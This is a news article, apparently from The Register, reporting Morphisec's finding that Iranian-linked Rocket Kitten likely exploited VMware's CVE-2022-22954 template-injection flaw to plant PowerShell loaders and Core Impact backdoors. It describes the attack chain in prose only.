A team of Iranian cyber-spies dubbed Rocket Kitten, for one, is likely behind attempts to exploit a critical remote-code execution vulnerability in VMware’s identity management software, according to endpoint security firm Morphisec.
Earlier this month, VMware disclosed and fixed the security flaw, tracked as CVE-2022-22954, in its Workspace ONE Access and Identity Manager software. In terms of CVSS severity, the bug was rated 9.8 out of 10. We note the virtualization giant revised its advisory on the matter on April 13 to say miscreants had exploited the vulnerability in the wild.
The bug involves server-side template injection, and can be abused by anyone with network access. Exploitation essentially clears the way for intruders to deploy ransomware, steal data, and perform any other dirty deeds.
Finding and exploiting a vulnerability in VMware’s platform is especially appealing due to the company’s expansive reach into basically every enterprise on the planet. More than 500,000 organizations globally use its virtualization and cloud computing software, according to the vendor.
VMware patched its flawed software on April 6, and attackers were not far behind. A proof-of-concept exploit emerged on April 11, and two days later malicious exploitation was seen in the wild, according to Morphisec.
The security shop’s analysis, published this week, claimed that advanced persistent threat groups are behind the exploitation, and have used the vulnerability to install HTTPS-based backdoors in victims’ networks. They also noted the “tactics, techniques, and procedures used in the attack are common among groups such as the Iranian linked Rocket Kitten.”
Rocket Kitten, which is thought to be sponsored by Tehran, targets government agencies, defense contractors, academic institutions, and journalists in North America, Europe, and the Middle East for cyber-espionage purposes.
We’re told the VMware server-side template injection flaw affects an Apache Tomcat component, and could allow Rocket Kitten, or any other miscreants, to execute malicious commands on a host server. After gaining entry through this hole, intruders used PowerShell to download and run the next stage: the PowerTrash Loader, which Morphisec noted is “a highly obfuscated PowerShell script with approximately 40,000 lines of code.”
The loader decompresses a payload and injects it into memory. The final payload in the attack was a Core Impact agent, which is a legitimate penetration-testing tool.
However, as Morphisec and others have noted, this and other pen-testing frameworks, such as Cobalt Strike and Metaspoit, are used by cyber-crime gangs to maintain network access, exfiltrate information, run commands, deliver ransomware, and deploy other malicious payloads.
“As with other penetration testing frameworks, these aren’t always used with good intentions,” the researchers wrote, adding that Trend Micro founnd [PDF] “a modified version of Core Impact was used in the Woolen-GoldFish campaign tied to the Rocket Kitten APT35 group.”
Morphisec was able to extract the command-and-control server address, client version, and communication encryption key from the code; see the above write-up for the technical details. ®